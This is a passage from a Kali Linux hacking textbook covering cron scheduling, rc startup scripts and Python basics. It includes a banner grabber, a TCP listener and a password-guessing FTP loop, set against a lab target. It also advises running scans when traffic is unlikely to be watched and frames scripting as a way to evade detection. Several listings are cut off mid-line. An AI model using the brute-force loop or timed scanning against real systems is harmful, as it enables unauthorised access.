To edit crontab, you can run the crontab command followed by the -e (edit)
option:
kali> crontab -e
Select an editor. To change later, run 'select-ed
1. /bin/nano   <----easiest
2. /usr/bin/mcedit
3. /usr/bin/vim.basic
4. /usr/bin/vim.gtk
5. /usr/bin/vim.tiny
Choose 1-5 [1]:
The first time you run this command, it will ask which editor you would
like to use. The default is /bin/nano, the option that tells you it’s the easiest.
If you choose this option, the terminal will open directly to crontab.

Another option, and often a better one for the newcomer to Linux, is to
open crontab directly in your favorite text editor, which you can do like so:
kali> mousepad /etc/crontab
I’ve used this command to open crontab in mousepad. You can see a
snippet of the file in Listing 16-2.
# /etc/crontab: system-wide crontab
# Unlike any other crontab, you don't have to run
# command to install the new version when you edi
# and files in /etc/cron.d. These files also have
# which no other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/u
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/c
25 6 * * * root test -x /usr/sbin/anacron II ( cd
47 6 * * 7 root test -x /usr/sbin/anacron II ( cd
52 6 1 * * root test -x /usr/sbin/anacron II ( cd
#
Listing 16-2: The crontab file in use in a text editor

Now, to set a new regularly scheduled task, you simply need to enter a new
line and save the file.
Scheduling a Backup Task
Let’s view this utility first from the system administrator’s perspective. As a
system administrator, you’d often want to run backups of all your files after
hours, while the system is not being used and resources are readily
available. (System backups tend to require system resources that are in
short demand during business hours.) The ideal time might be in the middle
of the night on the weekend. Rather than having to log in at 2:00 AM on
Saturday night/Sunday morning (I’m sure you have other priorities at that
time), you could schedule the backup to start automatically at that time,
even though you’re not at your computer.
Note that the hour field uses a 24-hour clock rather than using AM and PM,
so 1:00 PM is, for example, 13:00. Also, note that the days of the week
(DOW) start with Sunday (0) and end with Saturday (6).
To create a job, you simply need to edit the crontab file by adding a line in
the prescribed format. So, say you wanted to create a regular backup job
using a user account named “backup.” You would write a script for backing
up the system and save it as systembackup.sh in the /bin directory, then
schedule this backup to run every Saturday night/Sunday morning at 2:00
AM by adding the following line to crontab:

00 2 * * 0 backup /bin/systembackup.sh
Note that the * wildcard is used to indicate “any,” and using it in place of a
digit for the day of the month, month, or day of the week is read as “all”
days or months. If you read across this line, it says:
1. At the top of the hour (00),
2. Of the second hour (2),
3. Of any day of the month (*),
4. Of any month (*),
5. On Sunday (0),
6. As the backup user,
7. Execute the script at /bin/systembackup.sh.
The cron daemon will then execute that script every Sunday morning at 2:00
AM, every month.
If you only wanted the backup to run on the 15th and 30th of every month,
regardless of what days of the week those dates fell on, you could revise the
entry in crontab to appear as follows:
00 2 15,30 * * backup /root/systembackup.sh

Note that the day of the month (DOM) field now has 15,30. This tells the
system to run the script only on the 15th and 30th of every month, so
around every two weeks. When you want to specify multiple days, hours, or
months, you need to list them separated by a comma, as we did here.
Next, let’s assume the company requires you to be especially vigilant with
its backups. It can’t afford to lose even a day of data in the event of a power
outage or system crash. You would then need to back up the data every
weeknight by adding the following line:
00 23 * * 1-5 backup /root/systembackup.sh
This job would run at 11:00 PM (hour 23), every day of the month, every
month, but only on Monday through Friday (days 1–5). Especially note that
we designated the days Monday through Friday by providing an interval of
days (1-5) separated by a dash (-). This could have also been designated as
1,2,3,4,5; either way works perfectly fine.
Using crontab to Schedule Your MySQLscanner
Now that you understand the basics of scheduling a job with the crontab
command, let’s schedule the MySQLscanner.sh script, which seeks out open
MySQL ports, that you built in Chapter 8. This scanner searches for
systems running MySQL by looking for open port 3306.

To enter your MySQLscanner.sh to the crontab file, edit the file to provide
the particulars of this job, just as we did with the system backups. We’ll
schedule it to run during the day while you’re at work so it doesn’t take up
resources when you’re using your home system. To do this, enter the
following line in your crontab:
00 9 * * * user /usr/share/MySQLscanner.sh
We’ve set up the job to run at 00 minutes, at the ninth hour, every day of the
month (*), every month (*), every day of the week (*), and to run it as a
regular user. We simply need to save this crontab file to schedule the job.
Now, let’s say you wanted to be particularly careful and only run this
scanner on weekends and at 2:00 AM when it’s less likely that anyone is
watching the network traffic. You also only want it to run in the summer,
June through August. Your job would now look like this:
00 2 * 6-8 0,6 user /usr/share/MySQLscanner.sh
You would add this to your crontab like so:
# /etc/crontab: system-wide crontab
# Unlike any other crontab, you don't have to run
# command to install the new version when you edi

# and files in /etc/cron.d. These files also have
# which none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/u
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/c
25 6 * * * root test -x /usr/sbin/anacron II ( cd
47 6 * * 7 root test -x /usr/sbin/anacron II ( cd
52 6 1 * * root test -x /usr/sbin/anacron II ( cd
00 2 * 6-8 0,6 user /usr/share/MySQLscanner.sh
Now, your MySQLscanner.sh will run only on weekends in June, July, and
August at 2:00 AM.
crontab Shortcuts
The crontab file has some built-in shortcuts you can use instead of a
specifying the time, day, and month every time. These include the
following:
@yearly
@annually
@monthly
@weekly

@daily
@midnight
@noon
@reboot
So, if you wanted the MySQL scanner to run every night at midnight, you
could add the following line to the crontab file:
@midnight     user   /usr/share/MySQLscanner.sh
Using rc Scripts to Run Jobs at Startup
Whenever you start your Linux system, a number of scripts are run to set up
the environment for you. These are known as the rc scripts. After the kernel
has initialized and loaded all its modules, the kernel starts a daemon known
as init or initd. This daemon then begins to run a number of scripts found in
/etc/init.d/rc. These scripts include commands for starting many of the
services necessary to run your Linux system as you expect.
Linux Runlevels
Linux has multiple runlevels that indicate what services should be started at
bootup. For instance, runlevel 1 is single-user mode, and services such as

networking are not started in runlevel 1. The rc scripts are set to run
depending on what runlevel is selected:
0 Halt the system
1 Single-user/minimal mode
2–
5
Multiuser modes
6 Reboot the system
Adding Services to rc.d
You can add services for the rc.d script to run at startup using the update-rc.d
command. This command enables you to add or remove services from the
rc.d script. The syntax for update-rc.d is straightforward; you simply list the
command followed by the name of the script and then the action to perform,
like so:
kali> update-rc.d name of the script or service remove|de

As an example of how you can use update-rc.d, let’s assume you always
want the PostgreSQL database to start upon system boot so that your
Metasploit framework can use it to store pentesting and hacking results.
You would use update-rc.d to add a line to your rc.d script to have it up and
running every time you boot your system.
Before you do that, let’s check whether PostgreSQL is running on your
system already. You can do so using the ps command and piping it to a filter
looking for PostgreSQL using grep, like so:
kali> ps aux | grep postgresql
root   3876    0.0     0.0  12720    964pts/1    
postgresql
This output tells us that the only process ps found running for PostgreSQL
was the very command we ran looking for it, so there is no PostgreSQL
database running on this system presently.
Now, let’s update our rc.d to have PostgreSQL run automatically at bootup:
kali> sudo update-rc.dpostgresql defaults
This adds the line to the rc.d file. You need to reboot the system for the
change to take place. Once you’ve done that, let’s again use the ps

command with grep to look for a PostgreSQL process:
kali> ps aux | grep postgresql
postgresql  757  0.0  0.1 287636  25180 ?    S  M
0.00 /usr/lib/postgresql/9.6/bin/postgresql -D
/var/lib/postgresql/9.6/main
-c config_file=/etc/postgresql/9.6/main/postgresq
root   3876    0.0     0.0  12720    964pts/1    
As you can see, PostgreSQL is running without you ever entering any
commands manually. It automatically starts when your system boots up,
ready and waiting to be used with your Metasploit!
Adding Services to Your Bootup via a GUI
If you’re more comfortable working from a GUI to add services at startup,
you can download the rudimentary GUI-based tool rcconf from the Kali
repository, like so:
kali> sudo apt install rcconf
Once it has completed its installation, you can start rcconf by entering the
following:

kali> rcconf
This will open a simple GUI like the one in Figure 16-1. You can then scroll
through the available services, select the ones you want to start upon
bootup, and click OK.
Figure 16-1: The rcconf GUI for adding services to startup
In this figure, you can see the mariadb service listed. Press the spacebar to
select this service, press TAB to highlight <Ok>, and then press ENTER. The
next time you boot Kali, MariaDB will start automatically.
Summary

Both system administrators and hackers often need to schedule services,
scripts, and utilities to run at regular intervals. Linux enables you to
schedule nearly any script or utility to run on a regular basis using the cron
daemon, which runs these jobs from the cron table. In addition, you can
have services start automatically at bootup by using the command update-
rc.d or the GUI-based tool rcconf to update the rc.d scripts.
Exercises
1. Schedule your MySQLscanner.sh script to run every Wednesday at 3:00
PM.
2. Schedule your MySQLscanner.sh script to run every 10th day of the
month in April, June, and August.
3. Schedule your MySQLscanner.sh script to run every Tuesday through
Thursday at 10:00 AM.
4. Schedule your MySQLscanner.sh script to run daily at noon using the
shortcuts.
5. Update your rc.d script to run PostgreSQL every time your system boots.
6. Download and install rcconf and add the PostgreSQL and
MySQL/MariaDB databases to start at bootup.
OceanofPDF.com

17
PYTHON SCRIPTING BASICS FOR
HACKERS

Basic scripting skills are critical to becoming a master hacker. Without
having developed some basic scripting skills, a beginner hacker who simply
uses tools created by someone else will be condemned to the realm of script
kiddies. This means that you will be limited to using tools developed by
someone else, which decreases your probability of success and increases
your probability of detection by antivirus software, intrusion detection
systems (IDSs), and law enforcement. With some scripting skills, you can
elevate yourself to the upper echelon of the master hackers!
In Chapter 8, we covered bash scripting basics and built some simple
scripts, including MySQLScanner.sh, which finds systems running the
ubiquitous MySQL database system. In this chapter, we begin looking at the
scripting language most widely used by hackers: Python. Many of the most
popular hacker tools are written in Python, including sqlmap, scapy, recon-
ng, Sherlock, netcat, and many more. In addition, Python is a favorite in the
data analytics and machine learning communities.
Python has some important features that make it particularly well suited for
hacking, but probably most important, it has a huge variety of libraries—
prebuilt modules of code that can be imported externally and reused—that
provide some powerful functionality. Python ships with over 1,000 modules
built in, and many more are available in various other repositories.
Building hacking tools is possible in other languages too, such as bash, Perl,
and Ruby, but Python’s modules make building these tools much easier.

Adding Python Modules
When you install Python, you also install its set of standard libraries and
modules that provide an extensive range of capabilities, including built-in
data types, exception handling, numeric and math modules, file handling,
cryptographic services, internet data handling, and interaction with internet
protocols (IPs).
Despite all the power offered by these standard libraries and modules, you
may need or want additional third-party modules. The third-party modules
available for Python are extensive and are probably the reason most hackers
prefer Python for scripting. You can find a comprehensive list of third-party
modules at PyPI (the Python Package Index) at https://www.pypi.org.
Python has a package manager specifically for installing and managing
Python packages known as pip (Pip Installs Packages). Since we are
working with Python 3 here, you will need pip for Python 3 to download
and install packages. Pip should be included by default, but if you need to,
you can download and install pip from the Kali repository by entering the
following:
kali> sudo apt install python3-pip
Now, to download modules from PyPI, you can simply enter this:

kali> pip3 install package name
When you download these packages, they are automatically placed in the
/usr/local//lib/<python-version>/dist-packages directory. So, for instance, if
you had used pip to install the Python implementation of the SNMP
protocol for Python 3.7, you would find it at
/usr/local/lib/python3.7/pysnmp. If you aren’t sure where a package has
been placed on your system (sometimes different distributions of Linux use
different directories), you can enter pip3 followed by show and the package
name, as shown here:
kali> pip3 show pysnmp
Name: pysnmp
Version: 4.4.12
Summary: SNMP library for Python
Home-page: https://github.com/etingof/pysnmp
Author: Ilya Etingof<etingof@gmail.com>
Author-email: etingof@gmail.com
License: BSD
Location: /home/kali/.local/lib/python3.11/site-
Requires: pyansl, pycryptodomex, pysmi
You can see this gives you a lot of information about the package, including
the directory that holds it.

As an alternative to using pip, you can download a package directly from
the site (make certain that is downloaded to the proper directory), unpack it
(see Chapter 9 on how to unpack software), and then run the following:
kali> python3 setup.py install
This will install any unpacked packages that haven’t yet been installed.
Getting Started Scripting with Python
Now that you know how to install modules in Python, I want to cover some
of the basic concepts and terminology of Python, then the basic syntax.
After that, you’ll write some scripts that will be useful to hackers
everywhere and that I hope will demonstrate the power of Python.
Just as with bash or any other scripting language, we can create Python
scripts using any text editor. For this chapter, to keep things simple, I advise
you to use a simple text editor such as mousepad, but it’s useful to know
that a number of integrated development environments, or IDEs, are
available for use with Python. An IDE is like a text editor with other
capabilities built in, such as color-coding, debugging, and compiling
capabilities. Kali has an excellent, free IDE, Spyder, available in the Kali
repository, but there are many more IDEs available to download, of which
the best is arguably JetBrain’s PyCharm. This is an excellent IDE with a lot

of enhancements that make learning Python easier and quicker. There is a
professional version for purchase and a community edition that is free. You
can find them at https://www.jetbrains.com/pycharm/.
Once you’ve completed this chapter, if you want to keep learning Python,
PyCharm is an excellent tool that will help you in your development. For
now, we will use a basic text editor like mousepad to keep things simple.
Note that learning any programming language takes time and a lot of hard
work. Be patient with yourself—attempt to master each of the small scripts
I provide before moving on.
FORMATTING IN PYTHON
One difference between Python and some other scripting languages is that
formatting is critically important in Python. The Python interpreter uses the
formatting to determine how code is grouped. The particulars of the
formatting are less important than simply being consistent, particularly with
your indentation levels.
If you have a group of code lines that you start with double indentation, for
example, you must be consistent with the double indentation throughout the
entire block in order for Python to recognize that these code lines belong
together. This is different from scripting in other programming languages,
where formatting is optional and a best practice, but not required. You’ll

notice this as you go through and practice; it’s something to always keep in
mind!
Variables
Now, on to some more practical concepts in Python. A variable is one of the
most basic data types in programming, and you encountered it earlier in
Chapter 8 with bash scripting. In simple terms, a variable is a name
associated with a particular value such that whenever you use that name in
your program, it will invoke the associated value, similar to our
environment variables in Chapter 7.
The way it works is that the variable name points to data stored in a
memory location, which may contain any kind of value, such as an integer,
real number, string, floating-point number, Boolean (true or false
statement), list, or dictionary. We’ll briefly cover all of these in this chapter.
To become familiar with the basics, let’s create a simple script, shown in
Listing 17-1, in mousepad and save it as hackers-arise_greetings.py.
#! /usr/bin/python3
name="OccupyTheWeb"

print("Greetings to " + name + " from Hackers-Ari
Listing 17-1: Your first Python program
The first line simply tells your system that you want it to use the Python
interpreter to run this program, rather than any other language. The second
line defines a variable called name and assigns a value to it (in this case,
"OccupyTheWeb"). You should change this value to your own name. The value
of this variable is in the string character data format, meaning the content is
enclosed in quotation marks and is treated like text. You can put numbers in
strings, too, and they will be treated like text, but you won’t be able to use
them in numerical calculations.
The third line creates a print() statement concatenating Greetings to with the
value in the name variable, followed by the text from Hackers-Arise. The Best
Place to Learn Hacking! A print() statement will display whatever you pass to
it within the parentheses on your screen.
Now, before you can run this script, you need to give yourself permission to
execute it. We need the chmod command to do that (for more information on
Linux permissions, see Chapter 5):
kali> chmod 755 hackers-arise_greetings.py

Just as you did in Chapter 8 with bash scripting, to execute your script,
precede the script name with a period and forward slash. Your current
directory is not in the $PATH variable for security reasons, so we need to
precede the script name with ./ to tell the system to look in the current
directory for the filename and execute it.
To run this particular script, enter the following:
kali> ./hackers-arise_greetings.py
Greetings to OccupyTheWeb from Hackers-Arise. The
In Python, each variable type is treated like a class. A class is a kind of
template for creating objects. See “Object-Oriented Programming (OOP)”
on page 189 for more information. In the following script, I have attempted
to demonstrate a few of the types of variables. Variables can hold more than
just strings. Listing 17-2 shows some variables containing different data
types.
#! /usr/bin/python3
HackersAriseStringVariable = "Hackers-Arise Is th
HackersAriseIntegerVariable = 12
HackersAriseFloatingPointVariable = 3.1415

HackersAriseList = [1, 2, 3, 4, 5, 6]
HackersAriseDictionary = {'name': 'OccupyTheWeb',
print(HackersAriseStringVariable)
print(HackersAriseIntegerVariable)
print(HackersAriseFloatingPointVariable)
Listing 17-2: A series of data structures associated with variables
This creates five variables that contain different data types: a string, which
is treated as text; an integer, which is a number type without decimals that
can be used in numerical operations; a float, which is a number type with
decimals that can also be used in numerical operations; a list, which is a
series of values stored together; and a dictionary, which is an unordered set
of data where each value is paired with a key, meaning each value in the
dictionary has a unique identifying key. This is useful for when you want to
refer to or change a value by referring to a key name. For example, say you
have a dictionary called fruit_color configured like the following:
fruit_color = {'apple': 'red', 'grape': 'green',

If later in your script you want to get the fruit_color of the grape, you
simply call it by its key:
    print(fruit_color['grape'])
You could also change values for particular keys; for example, here we
change the color of the apple:
    fruit_color['apple']= 'green'
We will discuss lists and dictionaries in more detail later in the chapter.
Create this script in any text editor, save it as secondpythonscript.py, and
then give yourself permission to execute it, like so:
kali> chmod 755 secondpythonscript.py
When we run this script, it prints the values of the string variable, the
integer variable, and the floating-point number variable, like so:
kali> ./secondpythonscript.py
Hackers-Arise Is the Best Place to Learn Hacking

12
3.1415
NOTE
In Python, there is no need to declare a variable before
assigning a value to it, as in some other programming
languages.
Comments
Like any other programming and scripting language, Python has the
capability for adding comments. Comments are simply parts of your code—
words, sentences, and even paragraphs—that explain what the code is
meant to do. Python will recognize comments in your code and ignore
them. Although comments are not required, they’re incredibly helpful for
when you come back to your code two years later and can’t remember what
it should do. Programmers often use comments to explain what a certain
block of code does or to explain the logic behind choosing a particular
method of coding.
Comments are ignored by the interpreter. This means that any lines
designated as comments are skipped by the interpreter, which simply
continues until it encounters a legitimate line of code. Python uses the #

symbol to designate the start of single-line comment. If you want to write
multiline comments, you can use three double quotation marks (""") at the
start and end of the comment section.
In the following script, I have added a short, multiline comment to our
simple hackers-arise_greetings.py script.
#! /usr/bin/python3
"""
This is my first Python script with comments. Com
code to ourselves and fellow programmers. In this
a greeting for the user.
"""
name="OccupyTheWeb"
print("Greetings to " + name + " from Hackers-Ari
When we execute the script again, nothing changes compared to the last
time it was executed, as you can see here:
kali> ./hackers-arise_greetings.py
Greetings to OccupyTheWeb from Hackers-Arise. The
It runs exactly the same as it did in Listing 17-1, but now we have some
information about our script when we return to the code at a later time.

Functions
Functions in Python are bits of code that perform a particular action. The
print() statement you used earlier, for example, is a function that displays
whatever values you pass to it. Python has a number of built-in functions
you can immediately import and use. Most of them are available on your
default installation of Python in Kali Linux, although many more are
available from the downloadable libraries. Let’s take a look at just a few of
the thousands of functions available to you:
exit() Exits from a program.
float() Returns its argument as a floating-point number. For example,
float(1) would return 1.0.
help() Displays help on the object specified by its argument.
int() Returns the integer portion of its argument (truncates).
len() Returns the number of elements in a list or dictionary.
max() Returns the maximum value from its argument (a list).
open() Opens the file in the mode specified by its arguments.
range() Returns a list of integers between two values specified by its
arguments.
sorted() Takes a list as an argument and returns it with its elements in
order.
type() Returns the type of its argument (for example, int, file, method,
function).

You can also create your own functions to perform custom tasks. Since
there are so many built into the language, it’s always worth checking
whether a function already exists before going through the effort of building
it yourself. There are many ways to do this check. One is to look at the
official Python documentation available at https://docs.python.org. Choose
the version you are working with and then select Library Reference.
Lists
Many programming languages use arrays as a way to store multiple
separate objects. An array is a list of values that can be retrieved, deleted,
replaced, or worked with in various ways by referencing a particular value
in the array by its position in the list, known as its index. It’s important to
note that Python, like many other programming environments, begins
counting indexes at 0, so the first element in a list is index 0, the second is
index 1, the third is index 2, and so on. So, for instance, if we wanted to
access the third value in the array, we could do so with array[2]. In Python,
there are a few implementations of arrays, but probably the most common
implementation is known as a list.
Lists in Python are iterable, which means that the list can provide
successive elements when you run all the way through it (see “Loops” on
page 195). This is useful because quite often when we use lists, we are
looking through them to find a certain value, to print out values one by one,
or to take values from one list and put them into another list.

So, let’s imagine we need to display the fourth element in our list
HackersAriseList from Listing 17-2. We can access that element and print it
by calling the list’s name, HackersAriseList, followed by the index of the
element we want to access enclosed in square brackets.
To test this, add the following line to the bottom of your
secondpythonscript.py script to print the element at index 3 in
HackersAriseList:
--snip--
print(HackersAriseStringVariable)
print(HackersAriseIntegerVariable)
print(HackersAriseFloatingPointVariable)
print(HackersAriseList[3])
When we run this script again, we can see that the new print statement
prints 4 alongside the other output:
kali> ./secondpythonscript.py
Hackers-Arise Is the Best Place to Learn Hacking
12

3.1415
4
Modules
A module is simply a section of code saved into a separate file so you can
use it as many times as you need in your program without having to type it
all out again. If you want to use a module or any code from a module, you
need to import it. As discussed earlier, using standard and third-party
modules is one of the key features that makes Python so powerful for the
hacker. If we wanted to use the nmap module we installed earlier, we would
add the following line to our script:
import nmap
Later in this chapter, we will use two very useful modules: socket and
ftplib.
Object-Oriented Programming (OOP)
Before we delve deeper into Python, it’s probably worth taking a few
minutes to discuss the concept of object-oriented programming (OOP).
Python, like many programming languages today (C++, Java, and Ruby, to
name a few) adheres to the OOP model.

Figure 17-1 shows the basic concept behind OOP: the language’s main tool
is the object, which has properties in the form of attributes and states, as
well as methods that are actions performed by or on the object.
Figure 17-1: Illustration of object-oriented programming
The idea behind OOP-based programming languages is to create objects
that act like things in the real world. For example, a car is an object that has
properties, such as its wheels, color, size, and engine type; it also has
methods, which are the actions the car takes, such as accelerating and
locking the doors. From the perspective of natural human language, an
object is a noun, a property is an adjective, and a method is generally a
verb.
Objects are members of a class, which is basically a template for creating
objects with shared initial variables, properties, and methods. For instance,
say we had a class called cars; our car (a BMW) would be a member of the

class of cars. This class would also include other objects/cars, such as
Mercedes and Audi, as shown in Figure 17-2.
Figure 17-2: OOP classes and objects
Classes may also have subclasses. Our car class has a BMW subclass, and
an object of that subclass might be the model 320i.
Each object would have properties (make, model, year, and color) and
methods (start, drive, and park), as shown in Figure 17-3.

Figure 17-3: OOP properties and methods
In OOP languages, objects inherit the characteristics of their class, so the
BMW 320i would inherit the start, drive, and park methods from class car.
These OOP concepts are crucial to understanding how Python and other
OOP languages work, as you will see in the scripts in the following
sections.
Network Communications in Python
Before we move on to more Python concepts, let’s use what you’ve learned
so far to write a couple of hacking scripts to do with network connections.
Building a TCP Client

We’ll create a network connection in Python using the socket module. I’ve
already mentioned that Python comes with a library of modules for a
multitude of tasks. In this case, we will need the socket module to create a
TCP connection. Let’s see it in action.
For this section, create a target system on your network using the vulnerable
Metasploitable-2. This old Linux system is vulnerable to multiple attacks
and makes an easy target for our Python scripts. You can download it at
SourceForge (https://sourceforge.net/projects/metasploitable/).
Take a look at the script in Listing 17-3 named
HackersAriseSSHBannerGrab.py (I know, it’s a long name, but bear with
me here). A banner is what an application presents when someone or
something connects to it. It’s kind of like an application sending a greeting
announcing what it is. Hackers use a technique known as banner grabbing
to find out crucial information about what application or service is running
on a port.
   #! /usr/bin/python3
➊ import socket
➋ s = socket.socket()
➌ s.connect(("127.0.0.1", 22))

➍ answer = s.recv(1024)
➎ print(answer)
   s.close()
Listing 17-3: A banner-grabbing Python script
First, we import the socket module ➊ so we can use its functions and tools.
Here, we’re going to use the networking tools from the socket module to
take care of interfacing a connection over the network for us. A socket
provides a way for two computer nodes to communicate with each other.
Usually, one is a server and one is a client.
Then we create a new object, named s, instantiated from the socket class
from the socket module ➋. This way, we can now use this object to perform
further actions, such as connecting and reading data.
We then use the connect() method from the socket module ➌ to make a
network connection to a special IP and port. Remember that methods are
functions that are available for a particular object. The syntax is
object.method (for example, socket.connect). In this case, I’m connecting to IP
address 127.0.0.1, which is the IP address pointing back to localhost, the
same machine this script is running on, and port 22, which is the default
SSH port. You can test this on another instance of Linux or Kali. Most have
port 22 open by default.

Once you make the connection, there are a number of things you can do.
Here, we use the receive method recv to read 1,024 bytes of data from the
socket ➍ and store them in a variable named answer; these 1,024 bytes will
contain the banner information. Then we print the contents of that variable
to the screen with the print() function ➎ to see what data has been passed
over that socket, allowing us to spy on it! On the final line, we close the
connection.
Save this script as HackersAriseSSHBannerGrab.py and then change its
permissions using the chmod command so that you can execute it.
Let’s run this script to connect to another Linux system (you might use an
Ubuntu system or even another Kali system) on port 22. If SSH is running
on that port, we should be able to read the banner into our answer variable
and print it to the screen, as shown here:
kali> ./HackersAriseSSHBannerGrab.py
SSH-2.0-OpenSSH_7.3p1 Debian-1
We have just created a simple banner-grabbing Python script! We can use
this script to find out what application, version, and operating system are
running at that IP address and port. This gives us key information a hacker
needs before attacking a system. This is essentially what the website
Shodan.io does for nearly every IP address on the planet, and it catalogs and
indexes this information for us to search.

Creating a TCP Listener
We just created a TCP client that can make a connection to another TCP/IP
address and port and then spy on the information being transmitted. That
socket can also be used to create a TCP listener, to listen to connections
from outsiders to your server. Let’s try doing that next.
In the Python script shown in Listing 17-4, you’ll create a socket on any
port of your system that, when someone connects to that socket, collects
key information about the connector’s system. Enter the script and save it as
tcp_server.py. Make sure to give yourself execute permissions with chmod.
   #! /usr/bin/python3
   import socket
➊ TCP_IP = "192.168.181.190"
   TCP_PORT = 6996
   BUFFER_SIZE = 100
➋ s = socket.socket(socket.AF_INET, socket.SOCK_
➌ s.bind((TCP_IP, TCP_PORT))
➍ s.listen(1)
➎ conn, addr = s.accept()
   print('Connection address: ', addr )

while True:
       data=conn.recv(BUFFER_SIZE)
       if not data:
           break
       print("Received data: ", data)
       conn.send(data)  #echo
   conn.close()
Listing 17-4: A TCP-listening Python script
We declare that we want the script to run with the Python interpreter and
then import the socket module as before, so we can use its capabilities. We
then define variables to hold information for the TCP/IP address, the port to
listen on, and the buffer size of the data we want to capture from the
connecting system ➊.
We define the socket ➋ and bind the socket to the IP address and port ➌
using the variables we just created. We tell the socket to listen using the
listen() method from the socket library ➍.
We then capture the IP address and port of the connecting system using the
socket library’s accept method, and we print that information to the screen
so the user can see it ➎. Notice the while True: syntax here; we’ll discuss

this more later in the chapter, but for now just know that it is used to run the
indented code that comes after it indefinitely, meaning Python keeps
checking for data until the program is stopped.
Finally, we place the information from the connecting system into a buffer,
print it, and then close the connection.
Now, open a browser and browse to http://localhost:6996 to go to the 6996
port designated in our script. Run the tcp_server.py script, and you should
be able to connect and collect key information about that system, including
the IP address and port of the connecting system, as shown here:
kali> ./tcp_server.py
Connection Address: ('192.168.181.190', 45368)
Received data: Get /HTTP/1.1
Host:192.168.181.190:6996
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45
--snip--
This is critical information for a hacker to gather before deciding on an
exploit. Exploits (or hacks) are very specific to the operating system, the
application, and even the language being used, so the hacker needs to know
as much information as possible about the target before proceeding. This act
of gathering information prior to a hack is often referred to as

reconnaissance. You just developed a tool that will gather key
reconnaissance information on a potential target, very similar to the popular
hacker tool p0F!
Dictionaries, Control Statements, and Loops
Let’s keep expanding your understanding of Python and then use everything
you’ve learned so far to build a password cracker for an FTP server.
Dictionaries
Dictionaries hold information as unordered pairs, where each pair contains
a key and an associated value. We can use a dictionary to store a list of
items and give each item a label so we can use and refer to that item
individually. We might use a dictionary to store, for example, user IDs and
their associated names, or to store known vulnerabilities associated with a
specific host. Dictionaries in Python act like associative arrays in other
languages.
Like lists, dictionaries are iterable, meaning we use a control structure such
as a for statement to go through the entire dictionary, assigning each
element of the dictionary to a variable until we come to the end of the
dictionary.
Among other things, you might use this structure in building a password
cracker that iterates through each password stored in a dictionary until one

works or until the cracker comes to the end of the dictionary.
The syntax for creating a dictionary is as follows:
dict = {key1:value1, key2:value2, key3:value3...}
Note that for dictionaries, you use curly brackets and separate items with a
comma. You can include as many key-value pairs as you like.
Control Statements
Control statements allow your code to make decisions based on some
condition. There are a number of ways in Python to control the flow of the
script.
Let’s look at some of these structures in Python.
The if Statement
The if structure in Python, as in many other programming languages
including bash, is used to check whether a condition is true or not and run
different sets of code for each scenario. The syntax looks like this:
if conditional expression:
    run this code if the expression is true

The if statement contains a condition that might be something like if
variable < 10, for example. If the condition is met, the expression evaluates
to true, and then the code that follows, known as the control block, is
executed. If the statement evaluates to false, then the statements in the
control block are skipped over and not executed.
In Python, lines that introduce a control block must end with a colon, and
the control block must be indented. This indentation identifies the control
block to the interpreter. The next statement that is not indented is outside
the control block and therefore not part of the if statement, and this is how
Python knows where to skip to if the condition is not met.
The if . . . else Structure
The if...else structure in Python looks like this:
if conditional expression:
    run this code when the condition is met
else:
    run this code when the condition is not met
As before, first the interpreter checks the condition in the if expression. If it
evaluates to true, the interpreter executes the statements in the control
block. If the conditional statement evaluates to false, the control block
following the else statement is executed instead.

For example, here we have a code snippet that checks the value of a user
ID:
if userid == 0:
    print("You are the root user")
else:
    print("You are NOT the root user")
If it is 0 (the root user in Linux is always user ID 0), then we print the
message You are the root user. Else, if it is any other value, we print the
message You are NOT the root user.
Loops
Loops are another very useful structure in Python. Loops enable the
programmer to repeat a code block multiple times, depending on a value or
a condition. The two kinds of loops are while and for.
The while Loop
The while loop evaluates a Boolean expression (an expression that can
evaluate only to true or false) and continues execution while the expression
evaluates to true. For example, we could create a code snippet that prints
each number from 1 to 10 and then exits the loop, like so:

count = 1
while (count <= 10):
    print(count)
    count += 1
The indented control block then runs for as long as the condition is true.
The for Loop
The for loop can assign values from a list, a string, a dictionary, or some
other iterable structure to an index variable each time through the loop,
allowing us to use each item in the structure one after the other. For
example, we can use a for loop to attempt passwords until we find a match,
like so:
for password in passwords:
    attempt = connect(username, password)
    if attempt == "230":
        print("Password found: " + password)
        sys.exit(0)

In this code snippet, we create a for statement that continues through a list
of passwords we have provided and attempts to connect with a username
and password. If the connection attempt receives a 230 code, which is the
code for a successful FTP connection, the program prints "Password found:"
and then the password. It then exits. If it does not get a 230, it will continue
through each of the remaining passwords until it receives a 230 or until it
exhausts the list of passwords.
Improving Our Hacking Scripts
Now with a bit more background in Python looping structures and
conditional statements, let’s return to our banner-grabbing script and add
some capabilities.
We’ll add a list of ports that we want to grab the banner from, rather than
just listening on one port, and then loop through the list using a for
statement. In this way, we can search for and grab banners for multiple
ports and display them to the screen.
First, let’s create a list and put additional ports in it. Open
HackersAriseSSHBannerGrab.py, and we’ll work from there. Listing 17-5
shows the full code. Note that the grayed-out lines have stayed the same;
the black lines are the ones you need to change or add. We’ll try to grab
banners for ports 21 (ftp), 22 (ssh), 25 (smtp), and 3306 (mysql).

#! /usr/bin/python3
   import socket
➊ Ports = [21, 22, 25, 3306]
➋ for Port in Ports:
       s = socket.socket()
       print('This Is the Banner for the Port')
       print(Port)
    ➌ s.connect (("192.168.1.101", Port))
       answer = s.recv (1024)
       print(answer)
       s.close()
Listing 17-5: Improving the banner grabber
We create a list called Ports ➊ and add four elements, each representing a
port. Then we create a for statement that iterates through that list four times,

since it has four items ➋. Remember that when you’re using a for loop, the
code associated with the loop must be indented beneath the for statement.
We need to alter the program to reflect the use of a variable from the list on
each iteration through. To do so, we create a variable named Port and assign
it to the value from the list at each iteration. Then we use that variable in
our connection ➌. When the interpreter comes to that statement, it will
attempt to connect to whichever port is assigned to the variable at the IP
address.
Now, if you run this script on a system with all the ports listed open and
enabled, you should see something like Listing 17-6.
kali> ./HackersArisePortBannerGrab.py
This is the Banner for the Port
21
220 (vsFTPd 2.3.4)
This Is the Banner for the Port
22
SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
This Is the Banner for the Port
25
220 metasploitable.localdomain ESMTP Postfix (Ubu
This Is the Banner for the Port

3306
5.0.51a-3ubuntu5
Listing 17-6: Output for the port banner grabber
